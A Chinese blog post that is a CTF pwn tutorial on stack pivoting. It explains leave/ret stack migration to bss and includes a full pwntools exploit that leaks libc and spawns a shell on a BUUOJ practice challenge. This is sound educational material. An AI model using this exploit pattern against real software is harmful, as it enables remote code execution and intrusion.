PWN题型之栈迁移

最新推荐文章于 2024-01-28 20:43:51 发布
最新推荐文章于 2024-01-28 20:43:51 发布
阅读量1.3k 收藏 21
点赞数 5
分类专栏: pwn ctf 文章标签: unctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51032807/article/details/119211154
版权
pwn 同时被 2 个专栏收录
6 篇文章 3 订阅
订阅专栏
ctf
5 篇文章 2 订阅
订阅专栏

文章目录

前言

菜鸡总结,如有不对,望各位大佬及时指点,以免误人子弟。



0x1 :基本知识:

想必大家都知道用栈迁移技术来解决的问题了吧———溢出的长度不够,只能覆盖到返回地址,至于后面需要构造的rop链的长度显然是不够的。

如果大家对于C语言调用栈还不是很了解的话,建议了解之后再往下看,因为这个对于了解栈迁移有很大的帮助。可以看我的博客C语言调用栈 ,也可以自行去百度上面了解。

下面讲一下栈迁移用到的最关键的两个汇编指令leave指令和ret指令。其作用就是用来还原栈空间的。
在这里插入图片描述
其作用的结果图大概就是下面这样(下面是调用函数时开辟的栈空间):
在这里插入图片描述



0x2 :利用思路 :

利用前提:
(1)存在两个变量的输入,如果只能输入一次的话,那必然无法造成溢出,其中一个输入buf变量刚好能溢出到返回地址,而另一个输入变量s的内容应该是存放到bss段或者其他。
在这里插入图片描述
在这里插入图片描述

利用思路:一个栈空间长度不够,我既然能够输入两次,那我为什么不把这两个栈空间串联起来,就像把它变成一个栈一样(当然实质并不是这样的),这样的栈空间不就足够了吗?重点就是怎么样把两个栈串联起来呢?关键就是就是依靠leave和ret指令。

首先我们知道调用函数时栈的过程会保存栈布局,并且会移动ebp、esp以此来形成新的栈帧。那和leave ret指令有什么关系呢?

首先我们要知道栈迁移的payload的构成。下面是以32位的libc题型为例画的示意图

payload1 = p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)

payload2 = offset*'a' + p32(bss_addr-4) + p32(leave_ret_addr)

最终的效果其实就是和泄露libc时的一样,只不过多了一个leave_ret地址,而且由一个payload变成了两个payload。加上函数调用完以后本身会执行leave和ret指令,这样就有两个了,反复利用leave和ret指令以此来达到栈迁移的目的。

下面是payload在栈上面的布局情况:
在这里插入图片描述

我们重点来讲一讲函数调用完以后的返回过程,两个空间是怎么样串联起来的。

(1)第一个leave指令:它先将栈空间清空,将esp弄了回来,然后将(构造好的空间的地址-4)传给了ebp。那为什么地址要减4,这是就和第二个leave指令有关了,之后会有解释。

此时的栈内空间变化:
请添加图片描述

(2)第一个ret指令:它将带有leave和ret指令的地址传给了eip,那么接下来程序又会跳转到leave处。
此时的栈空间变化:
请添加图片描述

(3)第二个leave指:其实类似C语言调用栈过程(不过是相反的)。这里先mov esp ebp,然后再pop ebp。
bss-4的原因:这里由于需要再一次pop ebp,所以导致esp会变成esp的地址会加上4(32位),这也是为什么我们设置的bss段的地址要减去4,这样这样esp+4 = bss_addr,而我们构造的payload的地址是从bss_addr开始的,只有这样我们才能准确的执行。如果你将地址写成bss段,就会导致esp = bss_addr +4,然后执行预留返回地址,不会执行write_plt_addr。
这里需要提醒的是:这里是在bss段,并不是真的在栈当中,所以说之后的esp、ebp地址的变化其实并不需要管。只需要知道程序它会向下继续执行。

此时的栈空间变化:
在这里插入图片描述

(4)第二个ret指令:将write_plt_addr传给eip,执行write函数。

注意:bss段是从低地址向高地址往高地址增长,所以这是为什么esp在ebp的下面的原因。重点要知道的是他们之间的栈是怎么样的布局的,

总共返回时的流程为:

在这里插入图片描述

0x3 :实例讲解

题目链接:[Black Watch 入群题]PWN

程序分析:32位程序,开启了NX保护。打开IDA,查看一下源代码
在这里插入图片描述
代码分析:上文分析过了,漏洞利用:栈迁移技巧,然后发现没有system函数而且开启了NX保护,所以利用libc的来泄露system函数。本题:栈迁移 + libc。libc题型不会的可以看我的 PWN题型之Ret2libc

exp :

from pwn import *

#r = process("./pwn")
r = remote("node4.buuoj.cn",26026)

e = ELF("./pwn")
context(log_level = 'debug')
libc = ELF("./libc-2.23.so")

write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
bss_addr = 0x0804A300
leave_ret_addr = 0x08048511 

payload1 = p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
r.recvuntil("What is your name?")
r.sendline(payload1)

offset = 0x18
payload2 = offset*'a' + p32(bss_addr-4) + p32(leave_ret_addr)

r.recvuntil("What do you want to say?")
r.send(payload2)

write_addr = u32(r.recv(4))
print(hex(write_addr))
#pause()

base_addr = write_addr - libc.symbols["write"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()

payload3 = p32(system_addr) + p32(1) + p32(binsh_addr)
r.recvuntil("What is your name?")
r.sendline(payload3)

payload4 = offset*'a' + p32(bss_addr-4) + p32(leave_ret_addr)
r.recvuntil("What do you want to say?")
r.sendline(payload4)

r.sendline("cat flag")
r.interactive()

这里有一个需要注意的点就是,第二个payload发送是用的send,而不是sendline,这里我卡了半天。我觉得这和read函数的读取机制有关系,因为read函数是会读取\n的,当你发送的内容没有溢出的话,它会输出下来,但是当你溢出时他只会输出最多的字节数。具体的原理我也是还没搞懂。

总结:

栈迁移就是将这个空间不够的栈劫持(转移)到我能够写入的一个地方,只要这个地方的内容我提前布局好,就能想你想做的事情,我觉得就是两个栈空间结合起来,以此来扩大空间。

其实如果不是很懂得话,只需要记住:两个payload加起来,然后与之前的想必中间多了一个bss_addr和leave_ret_addr,并且偏移量只是到ebp处。但是如果只是知道做题而不懂原理我是一点作用都没有的,不要为了做题而做题,做题是为了掌握知识点。

swedsn
关注
  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1404
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,空间如下地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,空间为。
”BUUCTFpwn题解(一些题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
对于近期的反思
weixin_61283545的博客
01-20 230
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1481
更适合pwn入门新手体质的迁移教程
PWN——迁移
L2329794714的博客
08-29 1469
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
pwn迁移总结
最新发布
weixin_66751120的博客
01-28 2291
迁移往往在发生溢出的函数能够溢出的只有rbp与返回地址时进行,由于不能输入更多数据来构造rop链,一般会把迁往两个位置,一是原来的,二是bss段。在了解迁移之前需要先了解两个汇编指令,这是进行迁移的关键,leave,ret,这两个一般在函数的最后都会出现,可以清空中内容。leave可以理解为mov rsp,rbp;pop rbp这两个汇编指令的效果综合,但只是效果几乎一样,但并不是真的由它俩组成,第一步就是把rbp的值赋给rsp,也就是在同一位置了;
Pwn的常见保护介绍
educat0r的博客
02-16 1255
一:canary Canary是金丝雀的意思。技术上表示最先的测试的意思。这个来自以前挖煤的时候,矿工都会先把金丝雀放进矿洞,或者挖煤的时候一直带着金丝雀。金丝雀对甲烷和一氧化碳浓度比较敏感,会先报警。所以大家都用canary来搞最先的测试。stack canary表示的报警保护。 在函数返回值之前添加的一串随机数(不超过机器字长),末位为/x00(提供了覆盖最后一字节输出泄露canary的可...
pwn溢出10道练习题有writeup
01-04
pwn溢出练习题目,每题都有writeup.
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
CTF-PWN迁移
m0_53921051的博客
04-05 822
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
迁移基础
Civit_的博客
03-27 159
迁移就是控制E/RBP、E/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现程序执行流的目的。​ 溢出攻击时,一个条件就是上有充分的空间可以布局。当溢出空间不够时,就需要迁移来解决了。
ctf pwn 题目
m0_64195960的博客
04-11 1304
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
Linux PWN技巧之栈迁移
小小鱼的博客
02-16 1751
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
pwn--迁移
weixin_44642009的博客
04-17 938
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 630
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
[PWN] 迁移 ciscn_2019_es_2
LDX的博客
11-28 289
迁移 基础题目 理解 ciscn_2019_es_2
【BUUCTFPWN】ciscn_2019_es_2 迁移 劫持
m0_55368674的博客
01-16 600
【BUUCTFPWN】ciscn_2019_es_2题解
pwn printf 泄露地址
08-19
对于泄露地址,你可以利用格式化字符串漏洞来实现。首先,你需要找到一个可以输出中数据的地方,比如可以通过 `printf` 函数打印的地方。 然后,你可以构造一个格式化字符串,使用 `%x` 格式来读取中的数据。通过不断调整格式化字符串的位置和参数,你可以逐步泄露中的数据。 具体步骤如下: 1. 通过 `%p` 格式化字符串来获取 `printf` 函数在内存中的地址。 2. 分析布局,找到你感兴趣的上变量的相对偏移。 3. 构造格式化字符串,使用 `%x` 格式读取中数据,通过调整参数位置和偏移量,逐步泄露上的数据。 需要注意的是,在实际利用中,你可能需要多次尝试和调整格式化字符串的参数和偏移量,以便准确地泄露目标数据。另外,在漏洞利用过程中,请务必遵循合法和道德的原则,并且只在授权范围内进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值